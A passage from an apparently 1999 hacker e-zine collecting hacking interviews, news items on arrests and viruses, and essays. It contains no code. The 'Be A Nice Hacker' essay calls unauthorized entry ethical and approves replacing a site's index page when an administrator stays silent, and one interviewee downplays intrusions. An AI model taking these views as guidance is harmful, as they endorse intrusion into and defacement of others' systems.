find out what the evil was to begin with.
Murderer, that's easy. Burglar, embezzler,
rapist, kidnapper, all pretty clear. Now along
comes cracker and you don't even know
what the crime was. It could be crashing
every computer system in Botswana. Or it
could be copying a single file. We need to
avoid the labeling and start looking at what
we're actually talking about. But at the
same time, we have to remember that you
don't become a hacker simply because you
say you are.
12. Do people stay in hacking a long time, or
is it the kind of thing that people do for a few
years and then move on to something else?
It can be either. I tend to believe that it's
more of a philosophy, a way of looking at
something. When you have the hacker
perspective, you see potential where others
don't. Also, hackers think of things like
phones, computers, pagers, etc., as toys
and things to be enjoyed whereas others
see work and responsibility and actually
come to dread these things. That's why
hackers like to hold onto their world and not
become part of the mainstream. But it
certainly can and does happen.
13. What is the future of hacking?
As long as the human spirit is alive, there
will always be hackers. We may have a hell
of a fight on our hands if we continue to be
imprisoned and victimized for exploring, but
that will do anything but stop us.
14. Given increased attention to corporate
and government security, is it getting tougher
to hack or not?
Hacking isn't really about success -- it's
more the process of discovery. Even if real
security is implemented, there will always
be new systems, new developments, new
vulnerabilities. Hackers are always going to
be necessary to the process and we're not
easily bored.
15. Is the possibility of being identified and
even prosecuted an issue for most hackers?
Hackers make very bad criminals. This is
why we always wind up being prosecuted.
We don't hide very well or keep our mouths
sealed shut to protect corporate or
government interests. But the same
security holes would exist even if we
weren't around, so I think the hackers
should be properly seen as messengers.
That doesn't mean that you should expect
them to just hand over all of their
knowledge -- it's important to listen and
interpret on your own, as any hacker would.
16. Are there hackers who are up for hire?
What are they paid? Who hires them, and for
what?
Just as you can use hacker ability to attain
a life of crime, you can use that ability to
become a corporate success. Some are able
to hold onto their hacker ideals. Others,
sadly, lose them. It's especially hard when
young people who haven't worked it all out
yet are approached and tempted with huge
amounts of money by these entities. It can
be very hard to resist and the cost is often
greater than anticipated.
17. Have you had any contact with people
you consider cyberterrorists? Do you endorse
what they do?
In all of the time I've been in the scene,
which is a pretty long time, I've never come
across anyone I consider to be a
"cyberterrorist," whatever that is. Most
people who talk of such creatures either
have something to sell or some bill to pass.
This is not to say that such a concept is
impossible. But I believe the current
discussions aren't based in reality and have
very suspicious ulterior motives.
18. What about the people who hack into
Pentagon sites? Do you think they should be
punished?
According to the Pentagon, there is no risk
of anything classified being compromised
because it's not on the Internet. If they
were wrong, I would like to see someone
prove that. If a non-classified site is
hacked, I don't see the harm unless
something is damaged in some way.
Remember, the security hole was already
there. If a hacker finds it, it's far more likely
the people running the system will learn of
the hole. If a criminal or someone with an
ulterior motive (espionage, etc.) finds the
hole first, it's likely to remain secret for
much longer and the harm will be far
greater.
While you may resent the fact that some
14-year-old from Topeka proved your
security sucks, think of what could have
happened had you not learned of this and
had someone else done it instead. I'm the
first to say that people who cause damage
should be punished, but I really don't think
prison should be considered for something
like this unless the offender is a true risk to
society. The great majority of these cases
do not involve damage or vandalism, a fact
that largely goes unreported. What people
have to remember is that most of the time,
this is simply an example of kids being kids
and playing games like they have always
done.
Obviously, the tools have changed, but
that's really not something the kids are
responsible for. If some kid somewhere can
access your medical records or your phone
records, he or she is not the one who put
them there. The true violator of your
privacy is the person who made the
decision to make them easily accessible.
19. Your real name is Eric Corley. Why do you
use the name Emmanuel Goldstein?
I believe everyone should be given the
opportunity to name themselves. That name
should reflect something about who you are
and what you believe in and stand for.
Emmanuel Goldstein is that for me, and for
those who want to learn why, get a copy of
George Orwell's "1984" and see for yourself.
Interestingly, our first issue of 2600 was
published in January 1984. A complete
coincidence.
19.0 [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/TECH/specials/hackers/qandas/
Q&A with IBM's Charles Palmer
(CNN) -- Dr. Charles C. Palmer is the manager of
Network Security and Cryptography and head of
the Global Security Analysis Lab, which includes
IBM's ethical hacking unit.
1. How do you define hacking?
Hacking is unauthorized use of computer
and network resources. (The term "hacker"
originally meant a very gifted programmer.
In recent years though, with easier access
to multiple systems, it now has negative
implications.)
2. Are there appropriate forms of hacking?
Hacking is a felony in the United States and
most other countries. When it is done by
request and under a contract between an
ethical hacker and an organization, it's OK.
The key difference is that the ethical
hacker has authorization to probe the
target.
3. What do you and the other members of
your team do?
(We) work with IBM Consulting and its
customers to design and execute thorough
evaluations of their computer and network
security. Depending on the evaluation they
request (ranging from Web server probes to
all-out attacks), we gather as much
information as we can about the target
from publicly available sources. As we learn
more about the target, its subsidiaries and
network connectivity, we begin to probe for
weaknesses. Examples of weaknesses
include poor configuration of Web servers,
old or unpatched software, disabled
security controls, and poorly chosen or
default passwords. As we find and exploit
vulnerabilities, we document if and how we
gained access, as well as if anyone at the
organization noticed. (In nearly all the
cases, the Information Syhstems
department is not informed of these planned
attacks.) Then we work with the customer
to address the issues we've discovered.
4. What is the background of the people on
your team?
We have Ph.D.s in physics, computer
scientists, and even one former
photographer with a fine arts degree. They
are all well-known, highly respected system
security professionals from around the
world. Most of them did not start their
careers in this area, but ended up doing
computer and network security because
they were provoked by hackers at one time.
Once they started on the road to improving
security, they got hooked on the challenges
it presents.
5. In "Helpful Hacking" from IBM Research
magazine in 1997, you are quoted as saying
you don't hire reformed hackers and "there's
no such thing." Could you explain?
The number of really gifted hackers in the
world is very small, but there are lots of
wannabes.... When we do an ethical hack,
we could be holding the keys to that
company once we gain access. It's too
great a risk for our customers to be put in a
compromising position. With access to so
many systems and so much information, the
temptation for a former hacker could be too
great -- like a kid in an unattended candy
store.
6. Is it fair to say that you are opposed to
hacking?
As I said before, hacking is a felony -- for
good reason. Some of the "joyriders" --
hackers who access systems just for the
challenge -- think it's harmless since they
usually don't "do" anything besides go in
and look around. But if a stranger came into
your house, looked through everything,
touched several items, and left (after
building a small, out of the way door to be
sure he could easily enter again), would you
consider that harmless? These joyriders
could be causing damage inadvertently
since just by their presence they are using
system resources.
7. Do you think hacking can be useful?
Hacking can be useful in a controlled
environment where there are ground rules
and contractual agreements.
8. Do you have a profile of the typical hacker?
The profile has broadened in the last couple
of years to include many types of people,
which makes it very difficult to call out a
"typical" hacker. The motivations behind
hacking have changed (see Answer No. 11
below). No longer are hackers limited to the
teen-age, soda-slurping misfits, although
they're probably the majority. There are
girls and even younger kids. Many
companies think all hackers come from
outside, but surveys continue to show that
the threat from inside an organization is
greater than from outside. So if your
system is compromised, it could be a
Gen-Xer sitting in a dark apartment, or the
woman in the cubicle next to you.
9. There have been reported instances where
corporate security personnel have tracked
hacking back to the source, broken in and
stolen computers, or even used force. Do you
endorse "vigilantism" as a response to
hacking?
I've heard those stories, too, and I don't
believe most of them. It makes zero sense
to respond to an illegal attack with another
illegal attack. First of all, it can be very
difficult to accurately determine where an
attack comes from. Whether they end up
retaliating against the right or wrong
person, they've committed a felony and are
just as guilty as the original perpetrator. It's
no different than other forms of vigilante
justice.
10. What about attacking Web sites that list
hacking scripts?
Again, any attack is a felony. It's a First
Amendment rights issue as well. Where do
you draw the line? Attacking adult sites?
Attacking spammers? It makes more sense
for corporations, schools and other
organizations to try to block access to
those sites.
11. Can you characterize the nature of most
hacking attacks?
A few years ago, the original motivations
were pursuit of knowledge and the desire to
"show off" one's skills. Now, there are new
lures of money and power. However, the
statistics can be misleading, so many of
these incidents go unreported due to lack
of detection or fear of further losses due to
tarnished image and credibility.
I believe that the majority of hacks are still
motivated by curiosity and a desire to point
out system weaknesses. However, as
organizations have been finding, most of
today's threats come from within the
organization. According to a recent META
Group study, current figures indicate that
recent breaches of security within
Information Technology organizations occur
internally 58 percent of the time. The
threat from the outside is rising at a steady
rate, though.
12. Is there a trend in these attacks?
Denial-of-service attacks and macro-viruses
are the most popular hacker activities. The
denial-of-service attacks are fairly easy for
hackers of all skill levels -- from "script-kids"
to professionals -- to launch. This is a
situation where a company's Web site or
online service is simply made unavailable by
a hacker overtaxing the system resources.
It doesn't sound that harmful, but there can
be serious monetary and image losses
attached to this. If you want to buy a book
and you go to a popular book-selling Web
site and find that site unavailable, chances
are you'll try the next most popular book
Web site. There's simply too much
competition on the Internet right now to
overlook security needs. These
denial-of-service attacks are particularly
troubling because they are hard to defend
against. There are defenses available with
firewall products from IBM and other
companies, but there can be
denial-of-service attacks from inside as
well, which lends credence to the argument
for Intranet firewalls.
13. Where does the real threat of hacking lie:
in the private sector, in government or
somewhere else?
The widely reported attacks against
government sites are troubling, but it's a
good bet that the government would not
have any sensitive information on a machine
connected to the Internet. An unfortunate
side effect of these reports is that people
end up thinking that securing systems and
networks is hard. It's not hard, but it does
take time and training, and it's an ongoing
process to stay one step ahead of the bad
guys.
Corporate espionage is also a threat, but
not in the glamorous way portrayed in the
movies. There, the threat is from the inside.
There have been many reports of
employees purposely sending proprietary
information outside the company to other
companies, perhaps just before they
themselves move to that company. The
greater connectivity that employees have
today also leads them to inadvertent leaks
via e-mail.
14. To what extent is cyberterrorism a
genuine concern?
There is little motivation for industrial
control systems like those running nuclear
plants or airports to be on the open Web.
They may have dial-up access or private
networks within the organization that would
be susceptible to attack from the inside.
IBM has found that it can be quicker and
cheaper to attack a target physically,
rather than digitally -- we've nonchalantly
walked into businesses, snooped around,
and walked out with confidential material
(once with the security guard holding the
door for us!). And there are many examples
of unfortunate accidents that resulted in
very effective "attacks." The most common
example is the "backhoe attack," where an
errant heavy-equipment operator
accidentally cut a communications cable.
... I don't think we are "at war," because in
this problem the enemy includes ourselves.
We view it more as a race -- we're all trying
to stay a few steps ahead of the threats ...
through improved education and
technology. ... The good news is that
people are thinking about these issues, and
some groups appear to be taking action.
15. What about responses such as the recent
Pentagon counteroffensive that redirected
hackers' attack to an applet that caused their
browsers to crash? Is that an appropriate
response to hackers?
Anytime you acknowledge the hacker, you
run the risk of heightening his or her
interest. If you change the game from
solitaire to a real poker game with human
opponents, it becomes more interesting to
most hackers. Such retaliation is also
short-lived, since countermeasures will
quickly be developed and publicized around
the Web. In my opinion, this is not an
effective usage of limited security
personnel.
16. Are anti-hacking measures improving?
The most important improvement is in the
area of awareness. ... Advances in firewall
technology (making them easier to install
and configure), improvements in
vulnerability scanning and better
explanations of how to repair them, and
better intrusion-detection with fewer
false-positives are all key technologies in
this race.
17. If attacks can only take place on
computers that are online, to what extent
could hacking be mitigated by keeping
sensitive materials, data, etc., offline?
One of my colleagues at IBM likes to say,
"only trust physics." My version is that the
only 100 percent, truly secure system is
one that is powered-off and filled with
concrete. The military has long understood
the security of an "air gap" (where a secure
machine has no connection whatsoever to
an unsecured machine), and we recommend
to our customers that they consider such
an arrangement for their most secure
systems. This comes down to risk-analysis
-- that is, weighing the cost in convenience
and availability against the threat of having
a system online.
If it's important to ... your business to have
data available online inside the company,
then protecting it with an internal firewall
makes sense. ... If you have a Web server
you want your customers to access, you
can't hide it behind your corporate firewall
because they won't be able to get to it.
There are network designs that will enable
you to position the Web server on the
"outside," while securely maintaining a
connection between it and, perhaps, a
server behind the firewall.
18. What is the long-term outlook for
hacking?
As long as there are unsecured computers
with interesting stuff on them, there will be
hackers. Law enforcement agencies have
stepped up their facilities and training
programs to meet the demand for computer
and network security.
Moving toward technologies that use strong
encryption will greatly improve the overall
security of systems. Virtual Private
Networks are a fantastic tool for companies
and governments to protect their systems
and networks while taking advantage of the
low-cost, high-availability offered by the
Internet. Internet standards bodies are also
moving toward designing security into new
standards.
Most kids today know much more about
computers than their parents do, and some
start "messing around" at earlier ages than
in the past. The best thing we can do is to
show them how interesting it can be to
work at protecting systems and networks.
19. What about the outlook for computer
security?
While better security technologies are
appearing all the time, education and
awareness will continue to be the limiting
factor. System administrators must learn
about and maintain their systems securely.
Users have to understand their security
responsibilities (like choosing good
passwords, not installing unauthorized
modems, etc.). ... Innovations like
biometrics and smart cards will go a long
way toward making security easier for the
end user as well as for the system
administrators.
@HWA
20.0 Five Busted in Florida
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by squid stupid
It has been hard to nail down specific information but a
few local news outlets in Florida are reporting that four
students of Flagler Palm Coast High School may face a
slew of criminal charges for unlawful computer access.
The suspects have been accused of deleting grade files
and compromising exams on their school computer system.
Yahoo News
http://dailynews.yahoo.com/headlines/local/state/florida/story.html?s=v/rs/19990526/fl/index_6.html#11
Student Hackers Arrested - (BUNNELL) -- Five Flagler Palm Coast High School
students... including the son of a Bunnell city commissioner... are facing a
litany of criminal charges after allegedly using a computer virus to hack into
the school's network and commandeer files. No grades were changed but grade files
were deleted and exams compromised. The virus was discovered last month during a
software upgrade. The school's computer experts also found that each of the five
students had downloaded a ``hacker tool'' from the Internet into their personal
computer accounts. They're been suspended for the rest of the year... but the
students will be allowed to take their final exams next month. Prosecutors have
not decided if they will file criminal charges.
From ISN mailing list
Date: Thu, 27 May 1999 02:58:09 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Five arrested for hacking into high school system
Forwarded From: bluesky@rcia.com
May 26, 1999
Five arrested for hacking into high school system
By MATT GOWEN
BUNNELL - Five Flagler Palm Coast High School students - one the son of a
Bunnell city commissioner - are facing a litany of criminal charges after
authorities said they used a computer virus to hack into the school's
network and commandeer teacher and student files.
Flagler County sheriff's deputies arrested the students Monday. All five
were taken to the Division of Youth Services in Daytona Beach before being
released to their parents.
Facing the brunt of the allegations are Steven Alverson, 17, and Daniel
Bixby, 16, both of Palm Coast. Alverson was charged with 16 separate
felony counts, eight for crimes involving computers and eight for crimes
against computer users. Bixby was charged with 12 similar counts. Alverson
and Bixby were suspended until the end of the school year, June 4.
Arrested on two felony charges each were Yen Chen, 16, and Henry
Cervantes, 17, both of Palm Coast, and Daniel Dupont, 17, of Bunnell, son
of City Commissioner Catherine Robinson. School officials gave Chen,
Cervantes and Dupont in-school suspension until the end of the year.
The five will be allowed to return to take final exams June 7 and 8.
As for the criminal case, the State Attorney's Office will now decide
whether formal charges should be filed.
The arrests capped a lengthy investigation into the presence of the virus
- a disabling computer program that gave the students access to teacher
grade books and to exams on the system, according to reports.
The virus was initially discovered April 8 by technology support
personnel who were upgrading the school's protective software. In a
subsequent investigation, reports said, the school's computer experts
found that each of the five students had downloaded a "hacker tool" from
the Internet into their personal computer accounts.
FPCHS Assistant Principal Allan Haller said no grades were changed but
that grade files were deleted and exams were compromised.
"It was more mischievous than anything else," Haller said.
Still, he said, the high school's computer network connects to the
districtwide system, meaning the students could have eventually broken
into financial and payroll records or general personnel files.
"It could have been very disruptive," Haller said. "They could have shut
down the whole system."
The arrested students either preferred not to comment or could not be
reached for comment.
Robin Alverson, Steven Alverson's mother, said her son insisted he was
innocent of any criminal wrongdoing and offered to take a lie detector
test or voice-stress analysis to prove it.
"Steven is very computer literate," Robin Alverson said. "He is not
stupid. He knows that anything he does on there can be traced. That's the
thing that gets me."
One of their classmates, who asked not to be identified, said he thought
the group had simply downloaded games off the Internet and that one had a
virus attached to it.
But sheriff's reports describe a highly technical process - set in motion
Jan. 4 - involving hidden and renamed viruses that blocked administrators'
access to their files, making the path more difficult to trace.
"These students were very good," Flagler County School Superintendent
Robert Williams said, alleging that they viewed breaking into the system
as a challenge or game. "They were running our people ragged trying to
keep up with them."
Williams added that it was the first time the district has dealt with
unauthorized internal computer access, and that the disciplinary code will
be revamped accordingly over the summer.
The high school has four classroom computer labs, and Haller estimated
the school has more than 100 computers that connect to the Internet.
In the fall, each student is given his or her own password-protected
computer account to do research or work on word processing programs.
Students and parents must sign an agreement on proper use.
"Some of them choose to use their talents inappropriately," Haller said,
adding that peer pressure may have played a role. "Whether it's a macho
thing, whether it was a battle over school territory or whether they were
out to prove a point - 'We're smarter than you' - it's hard to say."
And as recent news reports demonstrate, even large agencies such as NASA
are not insulated from the potential for break-ins.
"We're a high school," Haller said. "We don't begin to have the kinds of
resources that the federal government has for protection."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
21.0 Danes Finger Swede for Cracking 12,000 Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Phoz
The Danish Police Computer Crime Unit have exposed a 17-year old from Sweden
claiming that he broke into at least 12,000 computers worldwide, including
military, bank, and university owned systems. The reports indicate that he
used an automated version of a BIND vulnerability to gain access and has been
compromising systems since early 1997.
phoz.dk- Translated News Reports.
http://phoz.dk/news/260599.html
@HWA
22.0 EFA Plans Net Censorship Demonstrations
From HNN http://www.hackernews.com/
contributed by photon
The Electronic Frontiers Australia have announced several protest events to
take place on Friday May 28. Local groups around Australia have been urged
to co-ordinate protests against government censorship. Australia's proposed
internet censorship legislation passed the Senate on Wednesday, and is expected
to pass through the House of Representatives some time next week.
Electronic Frontiers Australia
http://www.efa.org.au
Broadcasting Services Amendment (Online Services) Bill 1999
http://www.ozemail.com/~mbaker/amended.html
List of Australian Representatives
http://www.aph.gov.au/
Sydney Morning Herald
http://www.smh.com.au/news/9905/27/pageone/pageone7.html
Thursday, May 27, 1999
Internet providers plotting revenge over bill
By LAUREN MARTIN, in Canberra
Angry Internet service providers turned on the Government after its bill to
censor the Internet passed the Senate yesterday.
Requests from Government computer users were diverted to a protest page
which made the users wait 120 seconds before reaching their desired
destination.
"Get used to the delay," came the message. It was a warning that the plan
would slow the system.
Civil libertarians also protested by turning their computer Web site screens
black to mark their belief that the Government had - in the words of
Democrats Senator Natasha Stott Despoja - "turned its back on the Internet".
Anti-censorship group Electronic Frontiers Australia is organising nationwide
rallies for tomorrow in the real world - Sydney, Melbourne, Perth, Brisbane,
Adelaide and Wollongong.
One family-owned Internet provider in western Sydney, RP Internet Services,
yesterday was offering a month's untimed calls or 500 megabytes of data for
clients who showed up.
The company hopes to hire a hearse for the Sydney protest, which will move
from Hyde Park to the offices of the Australian Broadcasting Authority and the
Office of Film and Literature Classification.
Already one West Australian-based ISP had sent each senator a copy of
George Orwell's 1984, with a note: "The Online Services Bill is Orwellian in its
implications. It has no place in a free society."
But the bill is expected to move smoothly through the House of
Representatives and become law.
It outlines a complaints-based regime under which the ABA can force Internet
providers to remove material which would be considered offensive or illegal
under film and video guidelines.
If the material is not removed within one working day, ISPs face penalties of
tens of thousands of dollars.
The chief executive of the Internet Industry Association, Mr Peter Coroneous,
said the bill represented a "huge challenge".
"This has never been attempted anywhere in the world before, and people must
realise that we cannot necessarily come out with a magic bullet tomorrow."
The Communications Minister, Senator Alston, said the bill would "protect
Australian citizens, especially children" from unsuitable Internet sites.
But EFA president and Internet lawyer, Mr Kim Heitman, said it would not
protect anyone.
International sites (more than 90 million) could not be effectively blocked, he
said. Adult sites based in Australia would move offshore or underground.
"The internet is going to effortlessly evade the bill," Mr Heitman said. "It does
nothing but make us an international laughing stock for saying we can do the
impossible - it's a con job ...
"If the Government was serious about Internet content, they would pay to
educate parents and give police the resources to hunt down people who create
illegal content."
@HWA
23.0 Design Principals for Tamper-Resistant Smart Card Processors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Silicosis
The Advance Digital Security Research Department of
the University of Cambridge Computer Laboritory has
released an excellent paper on the security weaknesses
of smart cards and describes several methods of
extracting protected data and software from smart card
processors. Anyone who has been doing any smart card
hacking should probably read this.
Design Principals for Tamper-Resistant Smart Card Processors
http://www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf
@HWA
24.0 Melissa finds a mate
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Melissa will not Die
contributed by nVirb
Variants of the word Macro virus known as Melissa
continue to appear. This time the mutant disguises itself
in a '.rtf' named document as opposed to '.doc' which
helps to hide it from anti-virus software. It has been
speculated that Melissa and a virus known as CAP
discovered in 1997 may have met in the wild and
mutated together.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11162,00.html
Melissa Mutant Appears
Virus variation is disguised as an RTF file and
hides from vaccines.
by Matthew Nelson, InfoWorld Electric
May 27, 1999, 3:55 a.m. PT
The Melissa virus, which swept across networks
around the world last month, has popped up again in a
mutated format, which may have occurred when it
came into contact with another virus.
Melissa's latest variation uses a macro virus to
replicate itself across networks as the original did, but
now it changes the file extension of the Word
document from .doc to .rtf. This may effectively
camouflage the virus from antivirus systems that look
only for the .doc version of the attack.
The virus is not actually an RTF document, but is a
Word file masquerading as an RTF file, as RTF files
cannot contain macros.
"An RTF file cannot contain macros, so it cannot
contain macro viruses," says Sal Viveros, group
marketing manager for Total Virus Defense at Network
Associates, which was contacted about the virus by a
user. "But with Word you can name your extensions
any name you want, so all this virus writer did was
change the list.doc in Melissa to list.rtf."
Mutating in the Wild?
The RTF Melissa virus is similar to the CAP virus,
which was discovered in 1997 and altered .doc files to
.rtf files. CAP was summarily added to antivirus
application lists to guard against.
But given the similarity of the two viruses, and the
possible results of an interaction between the two,
Viveros speculates that the two viruses might have met
and mutated in the wild.
If a system infected with CAP virus also contracted
Melissa, then CAP could have altered the Melissa files
to replicate as RTF files and then continued to spread
the infection.
"It could have been that someone had the CAP virus on
their system who got infected by Melissa," says
Viveros. "Maybe it was accidental that this was
changed to RTF."
There is no way to be sure, Viveros adds. This new
version of the Melissa virus is one of many copycat
viruses discovered since the initial outbreak of the virus.
To protect against the latest version of Melissa,
Network Associates and other antivirus vendors
recommend that you update your antivirus data
definitions regularly and be cautious opening
suspicious messages, especially ones fitting the
Melissa profile of "Important message from ..".
@HWA
25.0 punkz.com sets up a feedback page for the presidential 'cyberwar'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
The Internet a Tool of War?
contributed by simonsays
Should the United States use the Internet as a tool of
war? A page has now been set up where you can email
the President with your concerns in response the
allegation that the CIA will break into various banks to
mess with official Yugoslavian bank accounts.
punkz.com/sixtoed
@HWA
26.0 Its that time of month again, when the 26th rolls around, look out...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I thought we already had a fix for the CIH virus but apparently the
Aussies want in on the action as well so heres yet another one...-Ed
Chernobyl Virus Cure Found in Australia
contributed by nvirB
With the 26th of the month arriving quickly developers
have been scrambling to create a fix for variants of the
CIH or Chernobyl Virus which may strike tomorrow. CIH
attacks a system by corrupting both the the File
Allocation Table and the BIOS. Developers in Australia
claim that they have created a program that will rebuild
the FAT table of an infected system. However, they
have been unable to solve the BIOS corruption problem.
News.com.au
http://technology.news.com.au/techno/4286612.htm
Local developer nukes Chernobyl bug
By IAN GRAYSON
25may99
A QUEENSLAND software expert has developed a fix for the malevolent
CIH virus, which corrupts hard drives, making PCs inoperable.
The virus, dubbed Chernobyl because it struck on the anniversary of
the nuclear accident, hit hundreds of thousands of PCs worldwide on
April 26.
CIH virus outbreaks have been most prevalent in the Asian region.
Some experts say this is because of the large amount of pirated
software in use there, and the fact that many CDs were infected at the
time of manufacture.
A variant of the virus has been found that will trigger tomorrow, and
could continue to strike on the 26th of each month until it is removed
from a system.
Virus expert with Queensland firm Hamilton Multi-media, James Wallis,
said he had created a fix that overcame the impact of the virus,
allowing users to access data on their hard drives.
"We sat down and figured out exactly how the virus corrupts the disks
and set out to develop a way to fix it," he said.
Mr Wallis said it took six 14-hour days to create the fix.
The company has made the fix available as a free download from its
Web site.
He said the virus could be beaten because only data in the first portion
of a hard drive, including the file allocation table, was corrupted.
The remainder was left intact but inaccessible until the lost section was
rebuilt.
"Our program starts at the end of the disk and works backwards," he
said.
"Using sophisticated algorithms, it recreates the data at the beginning
of the drive."
Mr Wallis said the fix had been used successfully to resurrect more than
a dozen infected hard drives brought in by customers.
More than 180 copies of the fix had been downloaded from the Web
site in the week after it was made available.
But Mr Wallis said little could be done for PCs in which the virus had
also attacked the BIOS chip. "In many cases it is a matter of having to
replace the chip because there is nothing that can be done in software
to fix it."
27.0 Submission: "Be A Nice Hacker" by System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
be a nice hacker...
by system ( 21st may 1999).
--------------------------------------------------------------------------------
[ Introduction. ]
I made this articles because there are so much cracker than a real hackers in
Indonesia and all over the world.
--------------------------------------------------------------------------------
[ General description. ]
A hacker is a people that can enter into some computer system without anybody
know about it. Generally a hacker do not intend to publish this interruption to
the internet communities, they don't like publication, they only want tray their
security, isn't it good or bad. If they found their security is bad or weak, they
will tell the administrator, tell them that there is a hole in their system, and
suggest the administrator to fix it before something bad happening to their system.
But with these days, this things were being forget by them who call their self a
hacker. There are so many hacking / cracking scene that only for publication purpose
at this time. They don't obey the ethics that in behind of underground world.
--------------------------------------------------------------------------------
[ A details description. ]
Being a hacker, they must remember one thing " DO NOT INTEND TO BREAK THE SYSTEM ".
We must keep this thing in our self, if you are the real hacker of course. A hacker,
that I'm already tell you in the front of this articles, only get inside the system,
looking around, if they find any hole in the system, they will tell the administrator
the hole. The hacker never break or change the data's that inside that system. Even if
they have a capabilities to break and change that data's, but look, they only look,
read, study it, if it is good for their self they keep it on their mind, if not they
leave it with out a trace.
I know this is probably sound pretty boring for you guy's that just get into this scene,
and sometime the question that exist in your mind is " So what's the benefit for me ? ".
Well, the benefit is the knowledge that you get, a hacker never do something for their
own purpose. They only study and study for getting a lot of knowledge.
So what the deals with this knowledge ?
To answer this question, you must look something that surrounding you. Let we see the
easy one, the monitor, the keyboard, the cpu, the mouse that you using right now, where
it come from ? From the science's isn't it ? Where science's come from ? From the
knowledge isn't it ?
Knowledge is the most important thing in this world, and I believe all knowledge will
be use, maybe not at this time, but it will in the next couple years or more.
Try to thing objectively, in old time Leonard Da Vinci has paint how the helicopter works
in his note pad, as all of you know at his time people even don't have any prescription
about a flying copter. But in a few years later, that could be happened like know. You
see, that the real value of a knowledge's.
To bad, these value of knowledge's has been forgotten just like that, many of our pal's
from Indonesia more like to break the system and change the data's that exist on it. One
thing that really occurred in Indonesia is they only want getting the free internet account
than the knowledge's. If this still happen in the next couple years, what is the main
purpose of internet ?
I tell you these for not make a certain people happy, but this negative phenomenon should
be get away from Indonesia, because Indonesia people can not think smart if they keep using
the internet in a wrong way.
Some people tell me that this is an equal position, because the telephone and internet fee
in Indonesia is very expensive if we compare it with the other country. Yes this is true,
but this is a wrong thinking. Don't look from one side, but look at two side or more. If
you are in the ISP and Telephone side, you will see what happening to them. They will broke
if you still do this.
Okay, back to the main subject. Why Indonesian hacker like to break the system ?
I don't sure for 100%, but I think this is happen because they lack of information, especially
the ethics in underground world. It is our job to tell them so they this is will not happen
again in the future.
I'm not a hacker, but I will they you some ethics that I know :
- Do not break the system
- Do not change the data's that exist on the system
- Tell the administrator the hole that you have been found
- Don't even try to delete all files in their system. ( If in Web server, please don't delete all
HTML / Scripts in their directory, if the administrator doesn't respond your email, change the
index.html with your own word, but keep the old one, rename the old one, for example oldindex.html,
as I know this only happen if the administrator not respond your email in 48 hours ).
- And for the administrator, your also need to obey the ethics. Keep the hacked version index.html
for 24 hours.
Let me tell you, if you obey these ethics, people will regret you, even you could be a friend with the administrator for no time.
--------------------------------------------------------------------------------
[ Summary. ]
- Being a hacker doesn't mean you will be famous in a short time.
- A hacker jobs is not an easy way.
- A hacker with out the ethics is just a looser mind.
- Remember, hacker only purpose is for knowledge.
##################################################################
This article is a translate version of " Jadilah hacker yang benar "
that made by System, at Friday 21st May. You can use this article
/ change it as you like, as long as you give me some credit.
I really like all comments / suggestion from you, please email it to
system@hackerlink.or.id. Check out http://www.hackerlink.or.id for
Indonesian underground news center.
##################################################################
@HWA
28.0 Hacking Memes by Stephen Downes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Pasty Drone, NewsTrolls
Hacking Memes
(Viewing this article is illegal in Australia)
This essay is about subversion.
1. The Essence of the Meme
The concept of the meme has been working its way around the web for a while
now, instantiating itself in Wired's regular feature, Hype List, in articles, and in
general currency.
As David Bennahum writes at the top of each issue of Meme, a meme is a
contagious idea that replicates like a virus, passed on from mind to
mind. Memes function the same way genes and viruses do, propagating
through communication networks and face-to-face contact between
people.
The tune you can't get out of your head, the phrase you keep using in your
conversation, the image of the perfect donut - these are all memes, ideas which
have passed from somewhere out there into your head and into your
consciousness.
Transference is the essence of the meme. Principia Cybernetica Web defines it as
"an information pattern, held in an individual's memory, which is capable of being
copied to another individual's memory." The Hacker's Dictionary defines it as "An
idea considered as a replicator, esp. with the connotation that memes parasitize
people into propagating them much as viruses do."
The concept, we are told, originates in Richard Dawkins's 1976 book The Selfish
Gene. The word 'meme' sounds like 'gene' and has similar properties. Humans,
from the point of view of either gene or meme, are the means by which genes - or
memes - are propogated. Animals, plants, and even ourselves, are merely their
disposable "survival machines".
Our human capacity to communicate consists in our ability to transfer idea from
one person to another. Not to say that such transference is perfect. We all know
the story where the message gets changed as it is whispered ear to ear down a line
of people. But it is reliable. Most of the time, the receiver gets the information the
sender wanted to convey.
Different forms of communication operate more or less effectively. A casual
conversation you have on the bus will be forgotten by day's end, while this essay
may linger in your mind a few days longer. Neither conversation nor essay,
however, has the staying power of the McDonald's jingle (sing it with me: You
deserve a break today...). Mere transference is not sufficient. For an idea to take
hold in another person, it must be internalized, it must be what Dreyfus and Dreyfus
call the expert, or intuitive, state of knowledge.
From the standpoint of humans, ideas are the currency of the information
economy. An idea which replicates well is worth money, because the idea that
implants itself of intuitive knowledge acts as a determinate of behaviour. The best
way to get a person to buy your product or to use your service is to internalize it, to
make dialing 10-10-800 an action. In advertising it's an old rule of thumb: mention
the product name three times in a 15 second spot.
As Andrew Garton laments,
The record industry maintains its status in the global economy and its
income streams by way of repetition. Music that is played over and over
again so much that it creates its own audience that in turn purchase its
representation to listen to it over and over again in their homes, their
cars, walkmans, bathrooms... anywhere one can think to place a
speaker.
Ideas - and not just advertising - transmit themsleves through repetition.
Hacking Memes
2. Advertising
